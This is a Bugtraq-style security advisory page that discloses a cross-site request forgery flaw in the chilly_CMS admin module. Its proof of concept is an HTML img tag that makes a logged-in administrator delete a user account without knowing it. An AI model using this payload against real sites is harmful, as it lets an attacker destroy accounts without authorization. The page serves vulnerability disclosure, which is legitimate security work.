|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  World Laboratory of Bugtraq Database |
||||||||||
SecurityAlert : None
Credit : Pratulag SecurityRisk : Low  (About) Remote : Yes Local : No Status : Bug
Text : ======================================================================= chilly_CMS CSRF Vulnerability ======================================================================= # Vulnerability found in- Admin module # email Pratulag@yahoo.com # company aksitservices # Credit by Pratul Agrawal # Software chilly_CMS # Category CMS / Portals # Site p4ge http://www.opensourcecms.com/demo/2/292/chillyCMS/admin/usergroups.site.php # Plateform php # Greetz to Gaurav, Prateek, Vivek, Sanjay, Sourabh, Varun (My Web Team) # Proof of concept # Targeted URL: http://www.opensourcecms.com/demo/2/292/chillyCMS Script to Delete the Admin user through Cross Site request forgery . ........................................................................... ..................................... <html> <body> <img src=http://demo.opensourcecms.com/chillycms/admin/usersgroups.site.php?acti on=deleteuser&id=[user ID] /> </body> </html> . ........................................................................... ....................................... After execution refresh the page and u can see that a added content is deleted automatically. #If you have any questions, comments, or concerns, feel free to contact me. Audyt bezpieczeństwaSecurity AuditAnaliza powłamaniowa References : None If you want change this note, please use UCP
|
||||||||||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |